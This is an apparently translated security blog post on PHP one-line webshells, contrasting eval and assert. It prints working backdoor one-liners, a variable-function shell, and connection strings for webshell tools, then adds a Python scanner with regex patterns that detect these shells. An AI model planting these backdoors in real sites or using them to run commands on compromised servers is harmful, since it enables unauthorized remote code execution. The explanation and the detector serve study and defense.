On the difference between eval and assert
2022-07-26 06:47:00 【Caker】
A brief look at how eval and assert differ when executing a one-line Trojan
What is a one-line Trojan
A one-line Trojan is a Trojan that needs only a single line of code; with just that one line it can provide the same functionality as a full-size webshell (a "big horse"). To evade WAF detection, one-line Trojans have been transformed in countless ways, but the essence is the same: the Trojan's function executes the commands we send.
How a one-line Trojan works
Data can be submitted to a website in three ways: GET, POST and COOKIE. A one-line Trojan uses $_GET[' '], $_POST[' '] or $_COOKIE[' '] to receive the data we send, passes the received data to the code-executing function in the Trojan, and the command is then executed.
Therefore, most classic one-line Trojans have only two parts: a function that can execute code, and a part that receives data.
For example:
<?php eval(@$_POST['a']); ?>
<?php assert(@$_POST['a']); ?>
Here eval is the function that executes the command and $_POST['a'] is the received data. eval executes the received data as PHP code. In this way, a website with a one-line Trojan inserted will execute whatever PHP statement we pass to it. This is what makes the one-line Trojan so powerful.
Example:
[Figure: phpinfo.png]
Because the Trojan receives the data in the POST parameter "a" ($_POST['a']), we have to send the data with the POST method and assign the code we want executed to "a". If the Trojan's post is replaced with get, we need to send "a" with the GET method instead (like this: http://127.0.0.1/test.php?a=phpinfo(); ). I won't demonstrate that again.
A special one-line Trojan
Normally, a common one-line Trojan uses the eval function directly, as in the examples above.
If you are given a one-line Trojan in the following form, how do you connect to it with a webshell tool?
<?php $_POST['1']($_POST['2']); ?>
This is explained below in terms of the different characteristics of eval and assert.
If you want to complete this one-line Trojan with eval, you cannot connect directly in the format 1=eval&2.

As shown in the figure, you will be told that the returned data is empty. The reason is that eval is a language construct, not a function, and cannot be called as a variable function.
PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.
Variable functions won't work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. You need to use your own wrapper functions to use any of these constructs as variable functions.
So eval is in fact not a "function" but a language construct of PHP itself. If you need to call it the "variable function" way, you have to build a wrapper yourself, something like this:
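<?php
// Wrapper: eval is a language construct, so it needs a real function around it
// before it can be reached through a variable function call.
function eval_1($str)
{
    eval($str);
}
$a = 'eval_1';
// The string handed to eval must be a complete statement, semicolon included.
$a('phpinfo();');
?>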
So we need another code-executing function, such as assert, to achieve this.
Using 1=assert(eval&2), the PHP code it is finally converted to is assert(eval($_POST['2'])).

As shown in the figure, the test succeeds.
Note: pay attention to the PHP version when testing. If the version used is above 7.1, the connection will fail.
The reason is 
Alternatively, connect directly with 1=assert&2. Note, however, that the base64 encoding must be selected for the connection,
because assert is treated as a function in PHP.
Analysis of the two encoding modes
base64
default
What is executed is our string, so the execution fails.
Packet capture analysis shows why the connection succeeds once base64 is used: the request carries one more eval function, so in essence we are executing assert(eval()), which is why it runs. We must be clear that the argument to eval is a string, while the argument to assert is an expression (or a function).
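The shapes discussed above (eval or assert fed directly from request data, a callee taken from the request as in $_POST['1']($_POST['2']), and a form field whose whole value is a callee name as in 1=assert&2) can be flagged on the defending side. The following is an added example, not code from the original post; the function names, rule names and sample strings are assumptions, and the regex heuristic does not cover transformed variants or wrapper functions such as eval_1.

```python
import re
from urllib.parse import parse_qsl

# Request superglobals: the "receives data" half of the shells shown above.
# $_REQUEST is included as well although the post only names the other three.
SUPERGLOBAL = r"\$_(?:GET|POST|COOKIE|REQUEST)\s*\[[^\]]*\]"

RULES = [
    # eval(@$_POST['a']) / assert(@$_POST['a']): request data goes straight
    # into a code-executing construct or function.
    ("exec-on-request-data",
     re.compile(r"\b(?:eval|assert)\s*\(\s*@?\s*" + SUPERGLOBAL, re.I)),
    # $_POST['1']($_POST['2']): the client picks which function is called.
    ("request-controlled-callee", re.compile(SUPERGLOBAL + r"\s*\(", re.I)),
]

# Callee names that the post's connection strings send as a field value.
CALLEES = {"eval", "assert"}


def scan_php(source):
    """Return sorted (line_number, rule_name) findings for PHP source text."""
    findings = set()
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.add((lineno, name))
    return sorted(findings)


def scan_form_body(body):
    """Return form field names whose entire value is a code-execution callee."""
    return [key for key, value in parse_qsl(body, keep_blank_values=True)
            if value.strip().lower() in CALLEES]


# Constructed samples: the three one-liners from the post, then its wrapper.
SHELLS = ("<?php eval(@$_POST['a']); ?>\n"
          "<?php assert(@$_POST['a']); ?>\n"
          "<?php $_POST['1']($_POST['2']); ?>\n")
WRAPPER = ("<?php\nfunction eval_1($str)\n{\n    eval($str);\n}\n"
           "$a = 'eval_1';\n$a('phpinfo();');\n")

if __name__ == "__main__":
    print(scan_php(SHELLS))    # all three one-liners are flagged
    print(scan_php(WRAPPER))   # no direct superglobal use, so nothing is flagged
    print(scan_form_body("1=assert&2=phpinfo%28%29%3B"))  # constructed body
```

The wrapper sample returning no findings shows where a source-level regex stops; catching that form needs data-flow analysis or runtime controls such as disabling the functions in PHP's configuration.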